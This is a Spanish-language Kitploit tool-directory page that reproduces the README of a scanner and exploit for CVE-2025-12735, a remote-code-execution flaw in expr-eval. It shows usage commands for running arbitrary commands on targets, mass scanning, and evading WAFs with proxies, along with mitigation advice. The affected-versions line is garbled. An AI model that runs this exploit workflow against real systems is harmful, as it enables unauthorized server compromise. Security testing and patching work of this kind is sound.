Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-12735-expr-eval-rce — Herramienta de investigación de seguridad para detectar y probar CVE-2025-12735 (vulnerabilidad RCE de expr-eval) | Kitploit
Herramientas/GitHubGitHub/an5i/cve-2025-12735-expr-eval-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHuban5i/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

Herramienta de investigación de seguridad para detectar y probar CVE-2025-12735 (vulnerabilidad RCE de expr-eval)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
11hace 9 mesesAún no revisado
Compartir

CVE-2025-12735 expr-eval RCE Exploit

Una herramienta de investigación de seguridad para detectar y probar la vulnerabilidad CVE-2025-12735 en los paquetes npm expr-eval y expr-eval-fork.

⚠️ Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Utilice esta herramienta únicamente en sistemas de su propiedad o sobre los que tenga permiso explícito por escrito para realizar pruebas.

📋 Resumen

CVE-2025-12735 es una vulnerabilidad crítica de ejecución remota de código (RCE) en los paquetes npm expr-eval y expr-eval-fork. Esta vulnerabilidad permite a los atacantes definir funciones arbitrarias dentro del objeto context utilizado por el analizador, lo que posibilita la inyección de código malicioso que ejecuta comandos a nivel de sistema.

Puntuación CVSS: 9.8 (Crítico)
Versiones afectadas: expr-eval-fork < 3.0.0 expr-eval-fork v3.0.0+


Versión corregida:

🔍 Características

  • Detección automática: Escanea el uso de la librería expr-eval en archivos JavaScript
  • Descubrimiento de endpoints: Encuentra automáticamente endpoints de evaluación
  • Prueba de vulnerabilidad: Comprueba la vulnerabilidad CVE-2025-12735
  • Ejecución de comandos: Demuestra la capacidad de RCE (para pruebas autorizadas)
  • Soporte de múltiples hilos: Escanea múltiples objetivos en paralelo
  • Soporte de proxy: Evita restricciones WAF/Cloudflare
  • Exportación JSON: Resultados detallados en formato JSON

📦 Instalación

Requisitos previos

  • Python 3.6 o superior
  • pip (administrador de paquetes de Python)

Instalación rápida

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# Instalar dependencias
pip install -r requirements.txt

# Hacer el script ejecutable (opcional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

Alternativa: Descarga directa

root@kitploit:~
# Descargar el script
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# Instalar dependencias
pip install requests

�️ Uso

Uso básico

root@kitploit:~
# Objetivo único
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# Ejecutar comando personalizado
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# Múltiples objetivos desde un archivo
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# Con múltiples hilos para escaneo más rápido
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# Salida detallada para depuración
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

Uso de proxies

root@kitploit:~
# Proxy único
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# Múltiples proxies desde un archivo
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

Opciones de línea de comandos

root@kitploit:~
-u, --url          URL del objetivo
-f, --file         Archivo que contiene las URLs objetivo (una por línea)
-c, --command      Comando a ejecutar (por defecto: id)
-t, --threads      Número de hilos (por defecto: 1)
-o, --output       Archivo de salida (por defecto: uknf_expr_eval_results.json)
-v, --verbose      Activar registro detallado
--proxy            URL del proxy (ej., http://127.0.0.1:8080)
--proxy-list       Archivo que contiene URLs de proxy (una por línea)

📊 Salida

El script genera un archivo JSON con resultados detallados:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 Cómo funciona

  1. Fase de detección: Escanea archivos JavaScript y contenido HTML en busca de referencias a expr-eval
  2. Descubrimiento de endpoints: Prueba endpoints API comunes que podrían usar expr-eval
  3. Prueba de vulnerabilidad: Intenta inyectar funciones arbitrarias en el objeto context
  4. Explotación: Si es vulnerable, demuestra la capacidad de RCE

🛡️ Mitigación

Si está utilizando expr-eval o expr-eval-fork:

  1. Actualice inmediatamente:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. Aplique el parche de seguridad:

    • Aplique el Pull Request #288 a expr-eval
    • O cambie a expr-eval-fork v3.0.0+
  3. Implemente validación de entrada:

    • Sanitice todas las entradas de usuario
    • Utilice listas blancas de funciones
    • Valide los objetos context

📚 Referencias

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • Aviso de GitHub: GHSA-jc85-fpwf-qm7x
  • Parche de seguridad: PR #288

📖 Ejemplos

Ejemplo 1: Escaneo de un solo objetivo

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

Ejemplo 2: Múltiples objetivos con salida

root@kitploit:~
# Crear archivo de objetivos
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Ejecutar escaneo
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

Ejemplo 3: Ejecución de comando personalizado

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

Ejemplo 4: Uso de proxies

root@kitploit:~
# Proxy único
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# Múltiples proxies desde un archivo
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dude en enviar un Pull Request.

  1. Haga un fork del repositorio
  2. Cree su rama de características (git checkout -b feature/AmazingFeature)
  3. Confirme sus cambios (git commit -m 'Add some AmazingFeature')
  4. Empuje a la rama (git push origin feature/AmazingFeature)
  5. Abra un Pull Request

🐛 Problemas

Si encuentra algún problema o tiene sugerencias, por favor abra un issue en GitHub.

📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.

⭐ Historial de estrellas

Si encuentra útil esta herramienta, considere darle una estrella en GitHub.

⚖️ Legal

Esta herramienta se proporciona solo con fines educativos y de pruebas de seguridad autorizadas. Los autores no son responsables del mal uso o daños causados por este programa. Los usuarios son responsables de asegurarse de tener la autorización adecuada antes de probar cualquier sistema.

🙏 Agradecimientos

  • Reportero original de la vulnerabilidad: Jangwoo Choe (UKO)
  • Centro de Coordinación CERT por la divulgación de la vulnerabilidad
  • GitHub Security y npm por los avisos de seguridad

💰 Donaciones

Si encuentra útil esta herramienta y desea apoyar el proyecto:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

¡Gracias por su apoyo! 🙏

Descargar herramienta